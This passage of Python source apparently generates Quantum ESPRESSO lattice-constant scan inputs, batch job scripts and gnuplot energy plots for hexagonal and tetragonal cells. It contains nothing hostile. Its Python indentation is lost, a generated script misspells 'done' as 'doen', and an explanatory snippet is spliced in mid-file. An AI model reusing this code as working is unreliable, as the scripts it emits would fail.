fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# write the header line of the energy data file
if na >= 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a c energy(Ry)\n")
fout.write("EOF\n")
if na >= 2 and nc < 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a energy(Ry)\n")
fout.write("EOF\n")
if na < 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: c energy(Ry)\n")
fout.write("EOF\n")
# end
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
if nc >= 2:
# both a and c are optimized
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${a}-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("doen\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'latconst(c)'\n")
fout.write("set zlabel 'Energy'\n")
fout.write("splot 'energy-latconst.data'\n")
fout.write("EOF\n")
else:
fout.write(" energy=`cat ../relax-${a}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# a is not optimized
if nc >= 2:
# only c is optimized
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(c)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# neither a nor c is optimized
pass
fout.write("gnuplot energy-latconst.gp\n")
#os.system("cd post-processing; bash get_energy.sh; cd ../")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
os.system("bash relax-hexagonal-%d-%d.sh" % (i_batch_a, i_batch_c))
os.chdir("../")
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
server_handle(auto=auto, directory=directory, jobfilebase="relax-hexagonal-%d-%d" % (i_batch_a, i_batch_c), server=self.run_params["server"])
def tetragonal(self, directory="tmp-qe-relax-tetragonal", runopt="gen", auto=0, range_a=[-0.1, 0.101, 0.01], range_c=[-0.1, 0.101, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
nc = len(np.arange(range_c[0], range_c[1], range_c[2]))
if self.batch_a is None:
# namely all in one batch
self.batch_a = na
else:
pass
if self.batch_c is None:
# namely all in one batch
self.batch_c = nc
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
if nc % self.batch_c == 0:
n_batch_c = int(nc / self.batch_c)
else:
n_batch_c = int(nc / self.batch_c) + 1
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal (i.e. fractional) coordinates can be converted from Cartesian coordinates;
# the conversion is a change of basis, analogous to a change of representation in quantum mechanics;
# convmat is built to perform this conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# writing forces act on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
# gen llhpc script
with open("relax-tetragonal-%d-%d.slurm" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# gen pbs script
with open("relax-tetragonal-%d-%d.pbs" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] is not None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtract range_a[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# subtract range_c[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_c_end > range_c[1]:
range_c_end = range_c[1]
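The batch-window arithmetic above can be sketched in isolation; `batch_window` below is a hypothetical helper written only to illustrate the half-step endpoint trick, it is not part of this module:

```python
# A minimal sketch of the batch-window computation used above: subtracting
# half a step from the endpoint keeps `seq` (or np.arange) from emitting the
# first value of the next batch at the boundary.
def batch_window(start, stop, step, batch_size, i_batch):
    """Return (lo, hi) bounds of the i-th batch over [start, stop]."""
    lo = start + i_batch * batch_size * step
    hi = start + (i_batch + 1) * batch_size * step - step / 2
    return lo, min(hi, stop)

lo0, hi0 = batch_window(-0.1, 0.1, 0.01, 5, 0)
lo1, hi1 = batch_window(-0.1, 0.1, 0.01, 5, 1)
# hi0 falls half a step below lo1, so consecutive batches never repeat a value
assert hi0 < lo1
```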
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# gen local bash script
with open("relax-tetragonal-%d-%d.bash" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtract range_a[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# subtract range_c[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${c}.in | tee relax-${a}-${c}.out\n" % self.run_params["mpi"])
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
